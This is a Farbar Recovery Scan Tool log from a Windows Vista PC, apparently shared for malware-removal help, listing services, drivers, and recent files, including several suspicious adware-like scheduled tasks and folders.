FF Extension: Search Web Know - C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441\Extensions\{c220f16f-ba07-4e7e-98e9-662f66164d42}.xpi [2016-01-22] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2014-11-18] [not signed]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 camsvc; C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCameraSrv.exe [20544 2009-04-16] (TOSHIBA)
R2 ConfigFree Gadget Service; C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe [36864 2009-03-06] (TOSHIBA CORPORATION) [File not signed]
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe [69632 2005-11-14] (Macrovision Corporation) [File not signed]
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [61440 2006-10-19] (Hewlett-Packard Company) [File not signed]
S3 lxcy_device; C:\Windows\system32\lxcycoms.exe [465408 2006-02-20] ( )
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.11.266\McCHSvc.exe [289256 2015-12-02] (McAfee, Inc.)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation)
R2 RSELSVC; C:\Program Files\TOSHIBA\rselect\RSelSvc.exe [55808 2009-02-19] (TOSHIBA Corporation) [File not signed]
R2 TNaviSrv; C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe [83312 2009-03-30] (TOSHIBA Corporation)
R2 TODDSrv; C:\Windows\system32\TODDSrv.exe [135168 2007-11-21] (TOSHIBA Corporation) [File not signed]
R2 TOSHIBA eco Utility Service; C:\Program Files\TOSHIBA\TECO\TecoService.exe [251392 2009-04-14] (TOSHIBA Corporation) [File not signed]
R2 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [84480 2009-03-17] (TOSHIBA Corporation) [File not signed]
R2 WebrootSpySweeperService; C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeper.exe [4048240 2009-11-06] (Webroot Software, Inc. (www.webroot.com))
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [383544 2008-01-20] (Microsoft Corporation)
R2 WRConsumerService; C:\Program Files (x86)\Webroot\WebrootSecurity\WRConsumerService.exe [1201640 2014-11-18] (Webroot Software, Inc. )

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation)
R0 ssfs0bbc; C:\Windows\System32\DRIVERS\ssfs0bbc.sys [37488 2009-11-06] (Webroot Software, Inc. (www.webroot.com))
R0 ssidrv; C:\Windows\System32\DRIVERS\ssidrv.sys [135280 2009-11-06] (Webroot Software, Inc. (www.webroot.com))
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-27 03:10 - 2016-01-27 03:13 - 00000000 ____D C:\AdwCleaner
2016-01-27 03:10 - 2016-01-26 20:05 - 01507840 _____ C:\Users\Barbara\Desktop\AdwCleaner.exe
2016-01-26 03:07 - 2016-01-26 03:10 - 00045370 _____ C:\Users\Barbara\Desktop\Addition.txt
2016-01-26 03:06 - 2016-01-30 12:35 - 00018814 _____ C:\Users\Barbara\Desktop\FRST.txt
2016-01-26 03:04 - 2016-01-30 12:34 - 00000000 ____D C:\FRST
2016-01-26 03:04 - 2016-01-25 13:24 - 02370560 _____ (Farbar) C:\Users\Barbara\Desktop\FRST64.exe
2016-01-23 18:13 - 2016-01-23 18:21 - 00076944 _____ C:\Windows\ntbtlog.txt
2016-01-23 17:05 - 2016-01-29 17:44 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-01-23 17:05 - 2016-01-23 17:05 - 00000952 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-01-23 17:05 - 2016-01-23 17:05 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-01-23 17:05 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-01-23 17:05 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-01-23 17:05 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-01-23 17:02 - 2016-01-23 17:03 - 22908888 _____ (Malwarebytes ) C:\Users\Barbara\Downloads\mbam-setup-2.2.0.1024.exe
2016-01-23 16:24 - 2016-01-23 16:24 - 00003446 _____ C:\Windows\System32\Tasks\Brooucnejo
2016-01-23 16:18 - 2016-01-23 18:07 - 00000000 ____D C:\ProgramData\rqNhmm
2016-01-23 16:12 - 2014-08-18 15:51 - 00971576 ____N C:\Windows\system32\pmls64.dll
2016-01-23 16:11 - 2016-01-23 16:11 - 00023252 _____ C:\Windows\System32\Tasks\{7E780D47-0D0B-0E05-0911-0F0C080A117D}
2016-01-23 16:11 - 2016-01-23 16:11 - 00000000 ____D C:\ProgramData\63405c24-6363-0
2016-01-23 16:11 - 2016-01-23 16:11 - 00000000 ____D C:\ProgramData\63405c24-08c3-1
2016-01-23 16:10 - 2016-01-30 12:36 - 00000270 _____ C:\Windows\Tasks\PubMach138.job
2016-01-23 16:10 - 2016-01-29 17:38 - 00000274 _____ C:\Windows\Tasks\OutstandinDivisio6.job
2016-01-23 16:10 - 2016-01-23 19:43 - 00000000 ____D C:\Users\Barbara\AppData\Local\CrazDivisio519
2016-01-23 16:10 - 2016-01-23 18:07 - 00000000 ____D C:\Users\Barbara\AppData\Local\NowUSeeItPlayer
2016-01-23 16:10 - 2016-01-23 18:06 - 00000000 ____D C:\Users\Barbara\AppData\Local\RustiSens806
2016-01-23 16:10 - 2016-01-23 16:10 - 00003162 _____ C:\Windows\System32\Tasks\OutstandinDivisio6
2016-01-23 16:10 - 2016-01-23 16:10 - 00003154 _____ C:\Windows\System32\Tasks\PubMach138
2016-01-17 12:03 - 2015-12-08 12:01 - 00801280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-01-17 12:03 - 2015-12-08 11:39 - 01065984 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 02873344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 01567744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 01548288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 01377792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 01326080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 01114624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00867328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpmde.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 00767488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00759296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00650240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00605184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-01-17 11:58 - 2015-12-05 12:03 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00212992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL
2016-01-17 11:58 - 2015-12-05 12:03 - 00208896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qasf.dll
2016-01-17 11:58 - 2015-12-05 12:02 - 00613888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2VDEC.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00606208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ENC.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00480256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-01-17 11:58 - 2015-12-05 12:02 - 00391680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ADEC.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00314880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00254976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00254976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00209920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2016-01-17 11:58 - 2015-12-05 12:02 - 00158208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00144384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax
2016-01-17 11:58 - 2015-12-05 12:02 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL
2016-01-17 11:58 - 2015-12-05 12:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll
2016-01-17 11:58 - 2015-12-05 12:02 - 00059392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll
2016-01-17 11:58 - 2015-12-05 11:41 - 01886208 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01706496 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01539072 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01350656 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01127424 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 01090560 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll
2016-01-17 11:58 - 2015-12-05 11:41 - 00942592 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 00819200 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 00732160 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL
2016-01-17 11:58 - 2015-12-05 11:41 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 03548672 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 01571328 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 00778752 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2VDEC.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00644608 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00620544 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ADEC.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00352256 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 00309248 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00301056 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00252416 _____ (Microsoft Corporation) C:\Windows\system32\qasf.dll
2016-01-17 11:58 - 2015-12-05 11:40 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL
2016-01-17 11:58 - 2015-12-05 11:40 - 00099328 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL
2016-01-17 11:58 - 2015-12-05 11:39 - 01074176 _____ (Microsoft Corporation) C:\Windows\system32\mcmde.dll
2016-01-17 11:58 - 2015-12-05 11:39 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-01-17 11:58 - 2015-12-05 11:39 - 00471040 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL
2016-01-17 11:58 - 2015-12-05 11:39 - 00278016 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-01-17 11:58 - 2015-12-05 11:39 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax
2016-01-17 11:58 - 2015-12-05 11:39 - 00187392 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL
2016-01-17 11:58 - 2015-12-05 11:39 - 00074752 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll
2016-01-17 11:58 - 2015-12-05 11:39 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll
2016-01-17 11:58 - 2015-12-05 11:22 - 00122368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys
2016-01-17 11:57 - 2015-12-05 12:03 - 00304640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2016-01-17 11:57 - 2015-12-05 11:39 - 00390656 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2016-01-17 11:48 - 2015-12-30 11:47 - 04694464 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-01-16 08:53 - 2015-12-15 17:28 - 17892352 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-01-16 08:53 - 2015-12-15 17:25 - 02350080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-01-16 08:53 - 2015-12-15 17:21 - 10938368 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-01-16 08:53 - 2015-12-15 17:20 - 01388032 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-01-16 08:53 - 2015-12-15 17:20 - 00448512 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-01-16 08:53 - 2015-12-15 17:19 - 02158080 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-01-16 08:53 - 2015-12-15 17:19 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-01-16 08:53 - 2015-12-15 17:18 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-01-16 08:53 - 2015-12-15 17:18 - 00816128 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00579584 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00453120 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00173568 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-01-16 08:53 - 2015-12-15 17:18 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2016-01-16 08:53 - 2015-12-15 17:18 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2016-01-16 08:53 - 2015-12-15 17:18 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2016-01-16 08:53 - 2015-12-15 16:50 - 01814528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-01-16 08:53 - 2015-12-15 16:49 - 12388864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-01-16 08:53 - 2015-12-15 16:47 - 00367616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-01-16 08:53 - 2015-12-15 16:46 - 09753088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-01-16 08:53 - 2015-12-15 16:45 - 01140224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-01-16 08:53 - 2015-12-15 16:45 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 01804800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-01-16 08:53 - 2015-12-15 16:44 - 00718848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 00424960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2016-01-16 08:53 - 2015-12-15 16:44 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-01-16 08:53 - 2015-12-15 16:44 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-01-16 08:53 - 2015-12-15 16:43 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2016-01-16 08:53 - 2015-12-15 16:43 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2016-01-16 08:52 - 2015-12-15 16:43 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2016-01-16 08:08 - 2015-12-05 10:34 - 02799616 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-01-16 08:07 - 2015-11-13 11:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapistub.dll
2016-01-16 08:07 - 2015-11-13 11:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapi32.dll
2016-01-16 08:07 - 2015-11-13 11:42 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\mapistub.dll
2016-01-16 08:07 - 2015-11-13 11:42 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\mapi32.dll
2016-01-16 08:07 - 2015-11-13 10:27 - 00013824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
2016-01-15 14:36 - 2016-01-15 14:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2016-01-08 20:17 - 2016-01-16 07:56 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-30 12:27 - 2014-11-19 20:20 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-30 12:27 - 2014-11-19 20:20 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-30 12:19 - 2015-01-19 10:44 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-01-30 12:15 - 2006-11-02 10:42 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-01-30 12:15 - 2006-11-02 10:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2016-01-30 12:15 - 2006-11-02 10:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2016-01-29 17:57 - 2006-11-02 10:42 - 00032544 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-01-27 03:15 - 2014-12-15 16:40 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\Yahoo!
2016-01-27 03:15 - 2014-12-15 16:39 - 00000000 ____D C:\Users\Barbara\AppData\LocalLow\Yahoo!
2016-01-27 03:15 - 2014-12-15 16:39 - 00000000 ____D C:\Program Files (x86)\Yahoo!
2016-01-26 03:07 - 2006-11-02 08:33 - 00000000 ____D C:\Windows
2016-01-26 03:04 - 2006-11-02 08:33 - 00000000 ____D C:\Windows\inf
2016-01-26 03:04 - 2006-11-02 07:46 - 00758862 _____ C:\Windows\system32\PerfStringBackup.INI
2016-01-23 18:06 - 2014-12-15 16:39 - 00000000 ____D C:\Users\Barbara\AppData\Roaming\ContentExplorer
2016-01-23 14:01 - 2015-03-17 13:00 - 00000370 _____ C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Barbara).job
2016-01-21 12:18 - 2014-11-20 07:14 - 00001656 _____ C:\Windows\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A.job
2016-01-21 12:17 - 2014-11-20 07:14 - 00008002 _____ C:\Windows\System32\Tasks\wrSpySweeper_L03A8FE54D0E241FEBA1A7A6479C3A52A
2016-01-20 11:18 - 2015-01-19 10:44 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-01-20 11:18 - 2015-01-19 10:44 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2016-01-20 11:18 - 2015-01-19 10:44 - 00003682 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2016-01-17 12:54 - 2006-11-02 08:33 - 00000000 ____D C:\Windows\rescache
2016-01-17 12:34 - 2014-11-22 10:31 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-01-17 12:23 - 2014-11-18 01:10 - 00000000 ____D C:\Windows\SysWOW64\RTCOM
2016-01-17 12:06 - 2014-11-18 00:49 - 00000000 ____D C:\ProgramData\Microsoft Help
2016-01-17 12:05 - 2014-11-22 10:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-01-17 11:57 - 2014-11-18 20:12 - 00000000 ____D C:\Windows\system32\MRT
2016-01-17 11:50 - 2006-11-02 07:35 - 143671360 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2016-01-16 08:28 - 2006-11-02 10:21 - 00332240 _____ C:\Windows\system32\FNTCACHE.DAT
2016-01-16 07:56 - 2015-05-31 10:14 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-01-15 14:36 - 2015-11-20 18:46 - 00000000 ____D C:\Program Files\McAfee Security Scan
2016-01-01 18:32 - 2015-01-31 14:56 - 00000000 ____D C:\Users\Barbara\Desktop\Family Tree

==================== Files in the root of some directories =======

2015-01-31 15:51 - 2015-07-22 17:07 - 0000240 _____ () C:\Users\Barbara\AppData\Roaming\wklnhst.dat
2014-11-18 18:24 - 2015-03-20 10:29 - 0000680 _____ () C:\Users\Barbara\AppData\Local\d3d9caps.dat
2014-12-15 16:46 - 2014-12-15 16:49 - 0004424 _____ () C:\Users\Barbara\AppData\Local\dd_vcredistMSI1954.txt
2014-12-15 16:46 - 2014-12-15 16:46 - 0016288 _____ () C:\Users\Barbara\AppData\Local\dd_vcredistUI1954.txt

Some files in TEMP:
====================
C:\Users\Barbara\AppData\Local\Temp\exec.exe
C:\Users\Barbara\AppData\Local\Temp\jre-8u31-windows-au.exe
C:\Users\Barbara\AppData\Local\Temp\NullsoftHelper.dll
C:\Users\Barbara\AppData\Local\Temp\sqlite3.dll
C:\Users\Barbara\AppData\Local\Temp\uires.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-01-30 12:28

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:24-01-2016
Ran by Barbara (2016-01-30 12:36:06)
Running from C:\Users\Barbara\Desktop
Windows Vista Home Premium Service Pack 2 (X64) (2014-11-18 05:42:01)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3355649212-3080085010-2879840853-500 - Administrator - Disabled)
Barbara (S-1-5-21-3355649212-3080085010-2879840853-1000 - Administrator - Enabled) => C:\Users\Barbara
